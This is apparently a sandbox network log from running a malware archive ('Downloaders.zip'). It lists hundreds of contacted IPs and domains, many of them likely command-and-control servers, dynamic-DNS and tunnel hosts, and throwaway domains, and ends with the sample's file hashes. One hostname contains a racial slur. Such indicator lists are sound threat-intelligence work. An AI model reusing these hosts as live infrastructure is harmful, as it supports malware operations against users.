FR 31.14.70.245:443 store4.gofile.io tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 gstatic.com udp
FR 142.250.74.227:443 gstatic.com tcp
SY 77.44.198.123:40500 udp
US 8.8.8.8:53 227.74.250.142.in-addr.arpa udp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 123.198.44.77.in-addr.arpa udp
FR 31.14.70.245:443 store4.gofile.io tcp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.124.170.33:443 steamcommunity.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 33.170.124.104.in-addr.arpa udp
US 8.8.8.8:53 store4.gofile.io udp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 iam.nigga.dad udp
TH 103.230.121.81:30220 iam.nigga.dad tcp
DE 94.156.177.33:80 94.156.177.33 tcp
NL 89.110.69.103:80 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
FR 31.14.70.245:443 store4.gofile.io tcp
YE 94.26.213.11:40500 udp
US 8.8.8.8:53 33.177.156.94.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 22.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 windriversfiles.imeitools.com udp
DE 167.71.56.116:22764 tcp
CN 221.231.39.69:80 windriversfiles.imeitools.com tcp
US 8.8.8.8:53 vaniloin.fun udp
US 8.8.8.8:53 11.213.26.94.in-addr.arpa udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 cowod.hopto.org udp
FR 31.14.70.245:443 store4.gofile.io tcp
US 148.163.102.170:4782 tcp
DE 212.113.107.84:80 212.113.107.84 tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
NL 89.110.69.103:80 tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 g.ceipmsn.com udp
US 162.159.138.232:443 discord.com tcp
US 20.41.62.11:80 g.ceipmsn.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
IR 5.239.6.63:40500 udp
US 8.8.8.8:53 84.107.113.212.in-addr.arpa udp
US 8.8.8.8:53 11.62.41.20.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
DE 167.71.56.116:22764 tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 20.41.62.11:80 g.ceipmsn.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 63.6.239.5.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 bingwallpaper.microsoft.com udp
US 52.173.134.115:443 bingwallpaper.microsoft.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 bingwallpaperimages.azureedge.net udp
US 13.107.246.64:443 bingwallpaperimages.azureedge.net tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
FR 89.156.24.108:1738 tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 64.246.107.13.in-addr.arpa udp
US 8.8.8.8:53 vaniloin.fun udp
US 148.163.102.170:4782 tcp
US 162.159.138.232:443 discord.com tcp
DE 167.71.56.116:22764 tcp
US 162.159.138.232:443 discord.com tcp
EG 102.189.164.188:40500 udp
US 8.8.8.8:53 188.164.189.102.in-addr.arpa udp
KR 152.67.212.187:443 152.67.212.187 tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 95.100.245.144:443 www.microsoft.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 144.245.100.95.in-addr.arpa udp
MX 189.173.142.192:40500 tcp
DE 167.71.56.116:22764 tcp
UZ 213.230.99.119:40500 udp
US 148.163.102.170:4782 tcp
US 8.8.8.8:53 ip-api.com udp
HK 47.238.55.14:5555 tcp
US 208.95.112.1:80 ip-api.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 119.99.230.213.in-addr.arpa udp
TH 103.230.121.81:30220 iam.nigga.dad tcp
US 8.8.8.8:53 vaniloin.fun udp
US 208.95.112.1:80 ip-api.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
GB 20.26.156.215:443 github.com tcp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 deauduafzgezzfgm.top udp
RU 185.215.113.66:80 deauduafzgezzfgm.top tcp
SA 141.147.143.12:80 141.147.143.12 tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 12.143.147.141.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
UZ 195.158.31.102:40500 udp
US 8.8.8.8:53 102.31.158.195.in-addr.arpa udp
US 8.8.8.8:53 scure2glbcubnk.es udp
US 104.21.82.246:443 scure2glbcubnk.es tcp
US 8.8.8.8:53 246.82.21.104.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.23:443 bitbucket.org tcp
US 148.163.102.170:4782 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 52.216.94.227:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 23.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 227.94.216.52.in-addr.arpa udp
US 8.8.8.8:53 twizt.net udp
RU 185.215.113.66:80 twizt.net tcp
US 208.95.112.1:80 ip-api.com tcp
DE 167.71.56.116:22764 tcp
RU 31.41.244.9:80 31.41.244.9 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 9.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.124.170.33:443 steamcommunity.com tcp
NL 45.136.51.217:2222 tcp
US 8.8.8.8:53 a23uuu1.oss-cn-hongkong.aliyuncs.com udp
FI 95.217.25.228:443 tcp
HK 47.79.66.210:80 a23uuu1.oss-cn-hongkong.aliyuncs.com tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
RU 83.239.55.170:40500 udp
US 8.8.8.8:53 210.66.79.47.in-addr.arpa udp
US 8.8.8.8:53 170.55.239.83.in-addr.arpa udp
CN 111.231.145.137:8888 tcp
DE 167.71.56.116:22764 tcp
GB 88.221.135.11:443 www.bing.com tcp
US 8.8.8.8:53 exonic-hacks.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 88.221.135.11:443 r.bing.com udp
GB 88.221.135.34:443 th.bing.com tcp
US 148.163.102.170:4782 tcp
GB 88.221.135.33:443 th.bing.com tcp
GB 88.221.135.33:443 th.bing.com tcp
GB 88.221.135.34:443 th.bing.com tcp
US 8.8.8.8:53 11.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 34.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 33.135.221.88.in-addr.arpa udp
GB 88.221.135.33:443 th.bing.com udp
GB 88.221.135.34:443 th.bing.com udp
US 8.8.8.8:53 applications-scenario.gl.at.ply.gg udp
US 147.185.221.21:53694 applications-scenario.gl.at.ply.gg tcp
UZ 90.156.164.28:40500 udp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.72:443 login.microsoftonline.com tcp
RU 91.240.118.204:8000 91.240.118.204 tcp
US 8.8.8.8:53 navegacionseguracol24vip.org udp
CO 181.131.217.244:30201 navegacionseguracol24vip.org tcp
FR 89.156.24.108:1738 tcp
US 8.8.8.8:53 28.164.156.90.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 204.118.240.91.in-addr.arpa udp
RU 185.81.68.147:80 185.81.68.147 tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 0.tcp.in.ngrok.io udp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp
RU 94.198.55.181:4337 tcp
DE 167.71.56.116:22764 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 181.55.198.94.in-addr.arpa udp
GB 82.117.243.110:5173 tcp
RU 185.81.68.147:1912 tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
DZ 41.200.68.144:40500 udp
US 148.163.102.170:4782 tcp
US 8.8.8.8:53 egorepetiiiosn.shop udp
US 8.8.8.8:53 144.68.200.41.in-addr.arpa udp
US 8.8.8.8:53 shelterryujxo.shop udp
US 8.8.8.8:53 chequedxmznp.shop udp
US 8.8.8.8:53 illnesmunxkza.shop udp
TM 91.202.233.141:80 91.202.233.141 tcp
US 8.8.8.8:53 triallyforwhgh.shop udp
US 8.8.8.8:53 shootydowtqosm.shop udp
US 8.8.8.8:53 faceddullinhs.shop udp
US 8.8.8.8:53 infect-crackle.cyou udp
US 8.8.8.8:53 ammycanedpors.shop udp
US 8.8.8.8:53 se-blurry.biz udp
GB 104.124.170.33:443 steamcommunity.com tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 8.8.8.8:53 dare-curbys.biz udp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 print-vexer.biz udp
US 8.8.8.8:53 impend-differ.biz udp
GB 104.124.170.33:443 steamcommunity.com tcp
US 148.163.102.170:4782 tcp
HK 47.238.55.14:5555 tcp
DE 167.71.56.116:22764 tcp
CO 181.131.217.244:30201 navegacionseguracol24vip.org tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 newstaticfreepoint24.ddns-ip.net udp
GB 104.124.170.33:443 steamcommunity.com tcp
CO 181.131.217.244:1842 newstaticfreepoint24.ddns-ip.net tcp
FI 95.217.25.228:443 tcp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp
DE 167.71.56.116:22764 tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 148.163.102.170:4782 tcp
RU 185.81.68.147:1912 tcp
FR 82.64.156.123:80 tcp
NL 45.136.51.217:2222 tcp
CN 183.57.21.131:8095 tcp
US 8.8.8.8:53 123.156.64.82.in-addr.arpa udp
TH 103.230.121.81:30220 iam.nigga.dad tcp
DE 167.71.56.116:22764 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 pentestfiles.s3.amazonaws.com udp
US 52.216.37.65:80 pentestfiles.s3.amazonaws.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
US 8.8.8.8:53 faulteyotk.site udp
US 8.8.8.8:53 seallysl.site udp
US 8.8.8.8:53 opposezmny.site udp
US 8.8.8.8:53 goalyfeastz.site udp
US 8.8.8.8:53 contemteny.site udp
US 8.8.8.8:53 dilemmadu.site udp
US 8.8.8.8:53 65.37.216.52.in-addr.arpa udp
US 8.8.8.8:53 148.68.81.185.in-addr.arpa udp
FR 82.64.156.123:80 tcp
US 8.8.8.8:53 authorisev.site udp
US 8.8.8.8:53 servicedny.site udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.124.170.33:443 steamcommunity.com tcp
FR 82.64.156.123:80 tcp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
FR 89.156.24.108:1738 tcp
US 148.163.102.170:4782 tcp
FR 82.64.156.123:80 tcp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 uXPSmpVlnejowfEuOvrjEhYZ.uXPSmpVlnejowfEuOvrjEhYZ udp
FR 82.64.156.123:80 tcp
US 147.185.221.21:53694 applications-scenario.gl.at.ply.gg tcp
GB 82.117.243.110:5173 tcp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
KR 152.67.212.187:443 152.67.212.187 tcp
DE 167.71.56.116:22764 tcp
FR 82.64.156.123:80 tcp
US 148.163.102.170:4782 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp
RU 185.81.68.148:80 185.81.68.148 tcp
FR 82.64.156.123:80 tcp
DE 167.71.56.116:22764 tcp
RU 185.81.68.147:1912 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
FR 82.64.156.123:80 tcp
NL 149.154.167.99:443 t.me tcp
GB 104.124.170.33:443 steamcommunity.com tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
US 148.163.102.170:4782 tcp
FI 95.217.25.228:443 tcp
CO 181.131.217.244:1842 newstaticfreepoint24.ddns-ip.net tcp
HK 47.238.55.14:5555 tcp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 ser.nrovn.xyz udp
VN 103.77.173.146:80 ser.nrovn.xyz tcp
FR 82.64.156.123:80 tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
US 8.8.8.8:53 146.173.77.103.in-addr.arpa udp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp
CN 183.57.21.131:8095 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
DE 167.71.56.116:22764 tcp
US 148.163.102.170:4782 tcp
NL 45.136.51.217:2222 tcp
FR 82.64.156.123:80 tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
FR 89.156.24.108:1738 tcp
DE 167.71.56.116:22764 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
FR 82.64.156.123:80 tcp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 status.mycompliancereports.com udp
CA 35.183.28.21:80 status.mycompliancereports.com tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
RU 185.215.113.36:80 185.215.113.36 tcp
US 148.163.102.170:4782 tcp
US 8.8.8.8:53 21.28.183.35.in-addr.arpa udp
FR 82.64.156.123:80 tcp
DE 167.71.56.116:22764 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 8.8.8.8:53 d2e5gvivzj4g90.cloudfront.net udp
US 8.8.8.8:53 36.113.215.185.in-addr.arpa udp
FR 18.164.55.74:443 d2e5gvivzj4g90.cloudfront.net tcp
VN 103.77.173.146:7707 ser.nrovn.xyz tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
US 8.8.8.8:53 74.55.164.18.in-addr.arpa udp
GB 82.117.243.110:5173 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
FR 82.64.156.123:80 tcp
US 8.8.8.8:53 condition-clearance.gl.at.ply.gg udp
US 147.185.221.19:7070 condition-clearance.gl.at.ply.gg tcp
RU 31.41.244.11:80 31.41.244.11 tcp
US 8.8.8.8:53 home.sevjs17sr.top udp
US 8.8.8.8:53 11.244.41.31.in-addr.arpa udp
US 147.185.221.21:53694 applications-scenario.gl.at.ply.gg tcp
DE 167.71.56.116:22764 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 148.163.102.170:4782 tcp
IN 3.6.231.193:15792 0.tcp.in.ngrok.io tcp
FR 82.64.156.123:80 tcp
NL 149.154.167.99:443 t.me tcp
RU 185.215.113.209:80 185.215.113.209 tcp
CO 181.131.217.244:1842 newstaticfreepoint24.ddns-ip.net tcp
US 8.8.8.8:53 ajax.googleapis.com udp
US 8.8.8.8:53 lipis.github.io udp
US 8.8.8.8:53 cdnjs.cloudflare.com udp
US 8.8.8.8:53 stackpath.bootstrapcdn.com udp
US 8.8.8.8:53 gateway.discord.gg udp
US 185.199.110.153:443 lipis.github.io tcp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
US 104.17.24.14:443 cdnjs.cloudflare.com tcp
US 104.18.10.207:443 stackpath.bootstrapcdn.com tcp
FR 142.250.201.170:443 ajax.googleapis.com tcp
US 162.159.130.234:443 gateway.discord.gg tcp
DE 167.71.56.116:22764 tcp
US 185.199.110.153:443 lipis.github.io tcp
US 8.8.8.8:53 153.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 14.24.17.104.in-addr.arpa udp
US 8.8.8.8:53 207.10.18.104.in-addr.arpa udp
US 8.8.8.8:53 170.201.250.142.in-addr.arpa udp
US 8.8.8.8:53 234.130.159.162.in-addr.arpa udp
FR 82.64.156.123:80 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
CN 183.57.21.131:8095 tcp
US 148.163.102.170:4782 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.147:80 185.81.68.147 tcp
RU 185.81.68.148:80 185.81.68.148 tcp
HK 47.238.55.14:5555 tcp
FR 194.59.30.220:1336 tcp
RU 31.41.244.12:80 31.41.244.12 tcp
DE 167.71.56.116:22764 tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
FR 82.64.156.123:80 tcp
US 8.8.8.8:53 12.244.41.31.in-addr.arpa udp
US 8.8.8.8:53 0.tcp.in.ngrok.io udp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 drive.google.com udp
FR 142.250.75.238:443 drive.google.com tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 c.pki.goog udp
FR 142.250.179.67:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
FR 142.250.179.67:80 o.pki.goog tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.75.250.142.in-addr.arpa udp
US 8.8.8.8:53 67.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 225.74.250.142.in-addr.arpa udp
RU 185.215.113.16:80 185.215.113.16 tcp
FR 82.64.156.123:80 tcp
US 8.8.8.8:53 ajsinvestment.org udp
NL 45.136.51.217:2222 tcp
BG 87.120.120.26:5959 ajsinvestment.org tcp
DE 167.71.56.116:22764 tcp
FR 89.156.24.108:1738 tcp
US 148.163.102.170:4782 tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
FR 82.64.156.123:80 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 ipinfo.io udp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 88.221.134.91:80 r11.o.lencr.org tcp
US 66.45.226.53:7777 66.45.226.53 tcp
US 8.8.8.8:53 91.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 53.226.45.66.in-addr.arpa udp
RU 94.143.243.155:9001 tcp
US 8.8.8.8:53 api.telegram.org udp
RU 212.109.16.228:21 tcp
RU 212.109.2.201:8001 212.109.2.201 tcp
RU 217.77.58.161:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
RU 217.77.48.229:80 tcp
RU 217.77.62.113:8000 tcp
RU 212.109.16.100:80 tcp
RU 217.77.61.58:8291 tcp
RU 185.9.80.66:9001 185.9.80.66 tcp
RU 217.77.48.179:22 tcp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 155.243.143.94.in-addr.arpa udp
US 8.8.8.8:53 201.2.109.212.in-addr.arpa udp
US 8.8.8.8:53 66.80.9.185.in-addr.arpa udp
KR 152.67.212.187:443 tcp
FR 82.64.156.123:80 tcp
US 148.163.102.170:4782 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
GB 82.117.243.110:5173 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 google.com udp
US 147.185.221.19:7070 condition-clearance.gl.at.ply.gg tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
VN 103.77.173.146:7707 ser.nrovn.xyz tcp
DE 167.71.56.116:22764 tcp
FR 82.64.156.123:80 tcp
NL 149.154.167.220:443 api.telegram.org tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
FR 142.250.75.238:443 drive.google.com tcp
US 147.185.221.21:53694 applications-scenario.gl.at.ply.gg tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
US 8.8.8.8:53 api.gofile.io udp
FR 45.112.123.126:443 api.gofile.io tcp
US 8.8.8.8:53 geolocation-db.com udp
DE 159.89.102.253:443 geolocation-db.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
CO 181.131.217.244:1842 newstaticfreepoint24.ddns-ip.net tcp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
FR 31.14.70.245:443 store4.gofile.io tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 162.159.138.232:443 discord.com tcp
RU 185.81.68.147:80 185.81.68.147 tcp
US 148.163.102.170:4782 tcp
DE 167.71.56.116:22764 tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 drive-connect.cyou udp
US 172.67.139.78:443 drive-connect.cyou tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 se-blurry.biz udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 zinc-sneark.biz udp
US 8.8.8.8:53 dwell-exclaim.biz udp
US 8.8.8.8:53 formy-spill.biz udp
US 8.8.8.8:53 covery-mover.biz udp
US 162.159.138.232:443 discord.com tcp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 dare-curbys.biz udp
US 8.8.8.8:53 78.139.67.172.in-addr.arpa udp
US 8.8.8.8:53 print-vexer.biz udp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 impend-differ.biz udp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 steamcommunity.com udp
FR 82.64.156.123:80 tcp
GB 104.124.170.33:443 steamcommunity.com tcp
US 162.159.138.232:443 discord.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 162.159.138.232:443 discord.com tcp
US 144.172.71.105:1338 144.172.71.105 tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 8.8.8.8:53 105.71.172.144.in-addr.arpa udp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
FR 31.14.70.245:443 store4.gofile.io tcp
US 162.159.138.232:443 discord.com tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 a1060630.xsph.ru udp
RU 141.8.192.138:80 a1060630.xsph.ru tcp
US 162.159.138.232:443 discord.com tcp
FR 82.64.156.123:80 tcp
DE 167.71.56.116:22764 tcp
US 144.172.71.105:1338 144.172.71.105 tcp
US 8.8.8.8:53 138.192.8.141.in-addr.arpa udp
US 8.8.8.8:53 ftp.ywxww.net udp
US 8.8.8.8:53 camp.zapto.org udp
CA 158.69.12.143:7771 camp.zapto.org tcp
CN 60.191.208.187:820 ftp.ywxww.net tcp
US 162.159.138.232:443 discord.com tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
FR 142.250.75.238:443 drive.google.com tcp
US 148.163.102.170:4782 tcp
US 162.159.138.232:443 discord.com tcp
FR 142.250.74.225:443 drive.usercontent.google.com tcp
HK 47.238.55.14:5555 tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
N/A 192.168.31.99:4782 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:80 github.com tcp
US 8.8.8.8:53 ipwho.is udp
GB 20.26.156.215:443 github.com tcp
DE 195.201.57.90:80 ipwho.is tcp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 162.159.138.232:443 discord.com tcp
FR 82.64.156.123:80 tcp
US 162.159.138.232:443 discord.com tcp
US 154.216.17.90:80 tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
DE 167.71.56.116:22764 tcp
US 162.159.138.232:443 discord.com tcp
US 162.159.138.232:443 discord.com tcp
US 34.117.59.81:443 ipinfo.io tcp
US 162.159.138.232:443 discord.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
RU 185.209.160.70:80 tcp
FR 89.156.24.108:1738 tcp
NL 45.136.51.217:2222 tcp
RU 176.113.115.19:80 176.113.115.19 tcp
FR 82.64.156.123:80 tcp
US 8.8.8.8:53 19.115.113.176.in-addr.arpa udp
US 8.8.8.8:53 www.speak-a-message.com udp
DE 195.201.119.163:80 www.speak-a-message.com tcp
US 8.8.8.8:53 163.119.201.195.in-addr.arpa udp
US 148.163.102.170:4782 tcp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 josecaceresport.duckdns.org udp
BG 87.120.116.122:5959 josecaceresport.duckdns.org tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
US 8.8.8.8:53 jrqh-hk.com udp
CN 123.136.92.99:80 jrqh-hk.com tcp
FR 82.64.156.123:80 tcp
US 8.8.8.8:53 99.92.136.123.in-addr.arpa udp
US 8.8.8.8:53 sordid-snaked.cyou udp
US 8.8.8.8:53 immureprech.biz udp
US 172.67.207.38:443 immureprech.biz tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 8.8.8.8:53 deafeninggeh.biz udp
US 104.21.32.1:443 deafeninggeh.biz tcp
US 8.8.8.8:53 effecterectz.xyz udp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
US 8.8.8.8:53 debonairnukk.xyz udp
US 8.8.8.8:53 wrathful-jammy.cyou udp
US 8.8.8.8:53 awake-weaves.cyou udp
GB 104.124.170.33:443 steamcommunity.com tcp
US 8.8.8.8:53 38.207.67.172.in-addr.arpa udp
US 8.8.8.8:53 1.32.21.104.in-addr.arpa udp
DE 167.71.56.116:22764 tcp
US 147.185.221.19:7070 condition-clearance.gl.at.ply.gg tcp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
FR 82.64.156.123:80 tcp
US 148.163.102.170:4782 tcp
GB 82.117.243.110:5173 tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
CO 181.131.217.244:1842 newstaticfreepoint24.ddns-ip.net tcp
VN 103.77.173.146:8808 ser.nrovn.xyz tcp
US 8.8.8.8:53 download.emailorganizer.com udp
NL 190.2.142.115:80 download.emailorganizer.com tcp
DE 167.71.56.116:22764 tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
FR 82.64.156.123:80 tcp
CA 158.69.12.143:7771 camp.zapto.org tcp
US 147.185.221.21:53694 applications-scenario.gl.at.ply.gg tcp
BG 87.120.116.122:5959 josecaceresport.duckdns.org tcp
N/A 192.168.56.1:4782 tcp
IN 35.154.189.194:15792 0.tcp.in.ngrok.io tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 148.163.102.170:4782 tcp
CO 181.131.217.244:30201 newstaticfreepoint24.ddns-ip.net tcp
FR 82.64.156.123:80 tcp
RU 31.41.244.10:80 31.41.244.10 tcp
DE 167.71.56.116:22764 tcp
US 8.8.8.8:53 10.244.41.31.in-addr.arpa udp
CA 158.69.12.143:7771 camp.zapto.org tcp
FR 82.64.156.123:80 tcp
TH 103.230.121.81:30220 iam.nigga.dad tcp
DE 167.71.56.116:22764 tcp
RU 185.209.160.70:80 tcp

Files

C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders.zip

MD5 94fe78dc42e3403d06477f995770733c
SHA1 ea6ba4a14bab2a976d62ea7ddd4940ec90560586
